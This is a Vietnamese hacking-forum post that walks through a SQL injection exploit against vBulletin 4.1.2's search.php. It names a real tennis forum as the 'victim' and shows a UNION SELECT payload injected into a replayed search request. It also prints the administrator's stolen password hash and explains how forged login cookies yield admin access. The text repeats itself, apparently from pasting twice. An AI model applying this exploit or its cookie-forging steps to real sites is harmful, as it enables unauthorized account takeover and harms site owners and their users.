S
StyleVN
New Member
ok mình bik đa số người bik về exploits này nhưng mình viết đại cho vui 
trước tiên chúng ta cần add-on trong firefox
và
ok chúng ta cần tìm 1 victim
Victim:http://www.tennisvn.net <= vbb 4.1.2
có nhiều người hỏi vậy sao check nó version nhiêu
1/thêm admincp như link http://www.tennisvn.net/admincp/ và mình nhìn vào có chữ vBulletin 4.1.2 Admin Control Panevậy là version 4.1.2 rùi
2/view page source và chúng ta nhìn vào
vậy là bik rùi
ok chúng ta bắt đầu cuộc hành trình
1/chúng ta cần register nick để vào dc group nó và thế ta vào group.php của nó như
![[Exploits]vbb 4.1.2(search.php)-Superkhung](/proxy.php?image=http%3A%2F%2Fnk0.upanh.com%2Fb2.s26.d1%2F6a90ad87881b30d691ffde033cc385cb_42945890.3.png&hash=0487bce3f14aefc8692ba57672104111 "[Exploits]vbb 4.1.2(search.php)-Superkhung")
và mình sẽ chọn group tennis Xì TEEN đễ bug :d
2/tiếp ta vào search.php của nó
mình tick cái groups của nó và keywords viết là (tên group) tennis Xì TEEN
lưu ý nên bật Live Http Header nhé
ok search nào
3/ sẽ ra group đó và chúng ta mỡ cái live http header ra và bạn kéo lên để kiếm cái
và kiếm từ Content-Length: 272
click bên dưới nó và chọn Replay
và tiếp thêm code vào
![[Exploits]vbb 4.1.2(search.php)-Superkhung](/proxy.php?image=http%3A%2F%2Fnk1.upanh.com%2Fb6.s13.d5%2F668d6fee5080c3cc8f48bdbde339be88_42946761.5.png&hash=976ff5a82341f644c513c1a23719bdbc "[Exploits]vbb 4.1.2(search.php)-Superkhung")
và click replay và trở lại web victim
chúng ta nhìn vào
Search:
Type: Groups; Keyword(s): tennis, TEEN; : Uncategorized, admin::9a5920bf6c717bb142ceb95566c82234
nay ta có username+password nó rùi nhé
9a5920bf6c717bb142ceb95566c82234<=MD5 nhưng đây ta chả cần giải nó bỏ vào
http://md5crack.com/
và bỏ pass đó vào generate MD5 HAsh
nó sẽ ra
4/ vậy là xong get user+pass của userid=1=admin rùi nhé
tiếp ta log off forum
bật cookie manager ở tools
mình click add
và ghi
Name:bb_userid
content:1
host:tennisvn.net
path:/
![[Exploits]vbb 4.1.2(search.php)-Superkhung](/proxy.php?image=http%3A%2F%2Fnk7.upanh.com%2Fb6.s16.d1%2F0506b8e79b2954572700370e3641772c_42947327.6.png&hash=0b407e4713442d8903951c49d9f2f0c0 "[Exploits]vbb 4.1.2(search.php)-Superkhung")
tiếp như trên nhé nhưng bên đây có tí thay đổi là
Name:bb_password
content
ass mới generate trên md5crack.com
ok click save giờ restart lại victim
và nó sẽ ra
![[Exploits]vbb 4.1.2(search.php)-Superkhung](/proxy.php?image=http%3A%2F%2Fnk7.upanh.com%2Fb6.s26.d1%2Ffd60620ef30fe1879863cbe064aecc33_42947897.tennisvn.png&hash=0a07c33136a2b8abc2255329252cacb3 "[Exploits]vbb 4.1.2(search.php)-Superkhung")
còn gà ... ai thấy có vấn để gì góp ý cho mình
trước tiên chúng ta cần add-on trong firefox
PHP:
Live Http Headervà
PHP:
cookies manager+ 1.5.1ok chúng ta cần tìm 1 victim
Victim:http://www.tennisvn.net <= vbb 4.1.2
có nhiều người hỏi vậy sao check nó version nhiêu
1/thêm admincp như link http://www.tennisvn.net/admincp/ và mình nhìn vào có chữ vBulletin 4.1.2 Admin Control Panevậy là version 4.1.2 rùi
2/view page source và chúng ta nhìn vào
PHP:
<meta name="generator" content="vBulletin 4.1.2" />ok chúng ta bắt đầu cuộc hành trình
1/chúng ta cần register nick để vào dc group nó và thế ta vào group.php của nó như
và mình sẽ chọn group tennis Xì TEEN đễ bug :d
2/tiếp ta vào search.php của nó
mình tick cái groups của nó và keywords viết là (tên group) tennis Xì TEEN
lưu ý nên bật Live Http Header nhé
ok search nào
3/ sẽ ra group đó và chúng ta mỡ cái live http header ra và bạn kéo lên để kiếm cái
PHP:
http://www.tennisvn.net/search.php?do=processvà kiếm từ Content-Length: 272
click bên dưới nó và chọn Replay
và tiếp thêm code vào
PHP:
&cat[0]=1) UNION SELECT concat(username,0x3a,0x3a,password) FROM user WHERE userid=1#và click replay và trở lại web victim
chúng ta nhìn vào
Search:
Type: Groups; Keyword(s): tennis, TEEN; : Uncategorized, admin::9a5920bf6c717bb142ceb95566c82234
nay ta có username+password nó rùi nhé
PHP:
admin::9a5920bf6c717bb142ceb95566c822349a5920bf6c717bb142ceb95566c82234<=MD5 nhưng đây ta chả cần giải nó bỏ vào
http://md5crack.com/
và bỏ pass đó vào generate MD5 HAsh
nó sẽ ra
PHP:
de399e3474d6570b92d46eb00dc5c1844/ vậy là xong get user+pass của userid=1=admin rùi nhé
tiếp ta log off forum
bật cookie manager ở tools
mình click add
và ghi
Name:bb_userid
content:1
host:tennisvn.net
path:/
tiếp như trên nhé nhưng bên đây có tí thay đổi là
Name:bb_password
content
ass mới generate trên md5crack.com ok click save giờ restart lại victim
và nó sẽ ra
còn gà ... ai thấy có vấn để gì góp ý cho mình
